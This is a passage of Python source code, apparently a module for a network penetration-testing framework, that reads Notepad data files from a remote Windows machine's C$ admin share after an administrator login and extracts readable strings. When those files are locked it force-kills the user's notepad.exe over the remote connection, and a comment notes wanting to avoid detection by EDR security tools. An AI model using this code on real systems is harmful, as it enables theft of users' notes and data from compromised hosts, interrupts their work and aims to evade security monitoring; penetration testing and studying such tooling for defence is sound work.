(self, connection, context, file_path, user)
| 90 | return string not in common_garbage |
| 91 | |
| 92 | def read_and_decode_file(self, connection, context, file_path, user): |
| 93 | buf = BytesIO() |
| 94 | try: |
| 95 | connection.conn.getFile("C$", file_path, buf.write) |
| 96 | except Exception as e: |
| 97 | if "STATUS_SHARING_VIOLATION" in str(e): # It means notepad.exe is open on target. |
| 98 | if self.kill: |
| 99 | try: |
| 100 | context.log.debug(f"Trying to kill notepad.exe process for {user} user.") |
| 101 | # To Do: Kill process with RPC, connection.execute can be detect by EDRs and module wont work. Or copy the target bin files without trigger the EDRs |
| 102 | connection.execute("taskkill /IM notepad.exe /F") # If notepad.exe open by user, needs to kill that process for reading files. |
| 103 | time.sleep(1) # Sleep 1 sec for finding and reading processing |
| 104 | context.log.debug(f"Notepad process was successfully killed for {user}") |
| 105 | connection.conn.getFile("C$", file_path, buf.write) |
| 106 | except Exception as e: |
| 107 | context.log.debug(f"Alternative method failed: {e}") |
| 108 | else: |
| 109 | context.log.fail("Notepad.exe is open on target. If want to kill process, add kill option true. (-o KILL=True)") |
| 110 | return [] |
| 111 | else: |
| 112 | # If it's a different error, just skip this file |
| 113 | context.log.debug(f"Error accessing {file_path}: {e}") |
| 114 | |
| 115 | buf.seek(0) |
| 116 | binary_data = buf.read() |
| 117 | |
| 118 | # Return only the meaningful strings |
| 119 | return [ |
| 120 | string for _, string in self.extract_strings(binary_data) |
| 121 | if self.is_meaningful_content(string) |
| 122 | ] |
| 123 | |
| 124 | def on_admin_login(self, context, connection): |
| 125 | self.context = context |
no test coverage detected